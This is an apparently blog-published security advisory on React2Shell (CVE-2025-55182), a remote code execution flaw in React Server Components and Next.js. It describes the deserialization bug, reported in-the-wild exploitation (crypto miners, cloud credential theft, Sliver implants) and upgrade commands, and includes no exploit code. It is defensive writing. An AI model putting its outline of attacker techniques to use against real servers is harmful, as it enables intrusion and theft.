By ByteBot
What Is React2Shell (CVE-2025-55182)?
React2Shell (CVE-2025-55182) is a maximum-severity vulnerability with a CVSS score of 10.0 affecting React Server Components and Next.js 15-16. Disclosed on December 3, 2025, the flaw allows attackers to execute arbitrary code on servers through a single malicious HTTP request—no authentication required. Within hours of disclosure, China state-sponsored threat groups began actively exploiting vulnerable servers for cryptomining, credential theft, and backdoor installation.
If you’re running Next.js 15.x or 16.x in production, you need to patch immediately. This isn’t a drill. Active exploitation is happening right now.
Why This Is Maximum Severity
A CVSS 10.0 score is as bad as it gets. React2Shell earned this rating because it requires no authentication, no user interaction, and can be exploited with a single HTTP POST request. The exploit is near 100% reliable, and public proof-of-concepts are already circulating.
The vulnerability exists in React’s internal Flight protocol, which serializes and deserializes component trees—the data structures that describe how UI components should render on the server. The server-side decoder fails to validate incoming payloads, allowing attackers to inject arbitrary objects that are then deserialized in privileged server contexts. Translation: attackers can execute whatever code they want with the privileges of your web server process.
Here’s the kicker: default configurations are vulnerable. A standard create-next-app build is exploitable out-of-the-box with zero code changes by the developer. According to React’s official security advisory, the framework trusted deserialized data by default—a catastrophic design flaw.
Active Exploitation in the Wild
Security researchers reported that a Darktrace honeypot was exploited in under two minutes after exposure. That’s not a typo. Attackers had automated scanning and exploitation workflows ready before the vulnerability was even publicly disclosed.
Within hours of the December 3 disclosure, Amazon and Google threat intelligence teams observed exploitation by China state-nexus groups including Earth Lamia and Jackpot Panda. By December 5, multiple victims had been compromised—primarily internet-facing Next.js applications and Kubernetes containers running React Server Components.
The attacks weren’t theoretical. Observed malicious activities include XMRig cryptocurrency miner deployment (via a script charmingly named “sex.sh”), AWS credential harvesting from environment variables and cloud instance metadata, Sliver malware framework installation, and data exfiltration with Base64-encoded credentials prepared for transfer.
If you haven’t patched, assume your server is already compromised. That’s the reality of a CVSS 10.0 vulnerability with active exploitation.
Who’s Affected and How Big Is This?
React powers over 11 million websites globally, and Next.js is the industry standard framework for React applications. Even though only 29% of developers have explicitly adopted React Server Components, millions of apps are still affected because RSC became the default in Next.js 14 and later. Many developers are running vulnerable code they didn’t even choose to use.
Affected versions include Next.js 15.0.0 through 16.0.6 and React 19.x Server Components. If you’re running any of these versions in production, you’re in the blast radius. The comparison to Log4Shell isn’t hyperbole—both are CVSS 10.0, both affect millions of applications, and both were weaponized within hours of disclosure.
How to Patch React2Shell
The fix is straightforward, but you need to act immediately. The fastest method is to run:
npx fix-react2shell-nextAlternatively, manually update to patched versions:
npm install next@14.2.35 # For Next.js 13.3+ and 14.x
npm install next@15.5.7 # For Next.js 15.x
npm install next@16.0.7 # For Next.js 16.xCritical note: if you already patched on December 3, you need to patch again. Security researchers discovered additional vulnerabilities (CVE-2025-55184 and CVE-2025-55183) while analyzing the initial fix, requiring further updates on December 11.
After updating, verify your package.json and package-lock.json reflect the new versions and test your application. WAF rules from Vercel, AWS, and Cloudflare provide partial protection, but they cannot guarantee defense against all exploit variants. Patching is the only reliable solution.
Lessons from React’s Log4Shell Moment
Vercel’s response was nothing short of heroic. The team ran a 24/7 operation for weeks—”nobody slept through the weekend, nobody slept through the night,” according to the Vercel CTO. They launched a HackerOne bounty program offering $50,000 per verified bypass technique, ultimately paying out $1 million for 20 unique bypasses discovered by 116 researchers. That effort blocked over 6 million exploit attempts.
But here’s the uncomfortable question: should frameworks default to experimental features in the first place? React Server Components were “bleeding edge” when Next.js made them the default in version 14. Performance gains are impressive—initial render times drop by 67%—but at what cost?
This incident exposed the danger of “move fast, break security” culture. Defaulting to experimental features without rigorous security audits put millions of applications at risk. Only 29% of developers had explicitly adopted RSC, yet millions more were unknowingly running vulnerable code because it shipped as the default configuration.
The lesson is clear: frameworks need to be secure by default. Experimental features with massive attack surfaces shouldn’t become production defaults until they’ve been battle-tested. And for developers, dependency updates aren’t optional maintenance tasks—they’re emergency security patches. If you’re running production React or Next.js, you own your security posture.
React and Next.js aren’t inherently insecure, but React2Shell proved that trusting framework defaults can be catastrophic. Patch immediately, monitor for signs of compromise, and remember: security isn’t someone else’s problem. It’s yours.
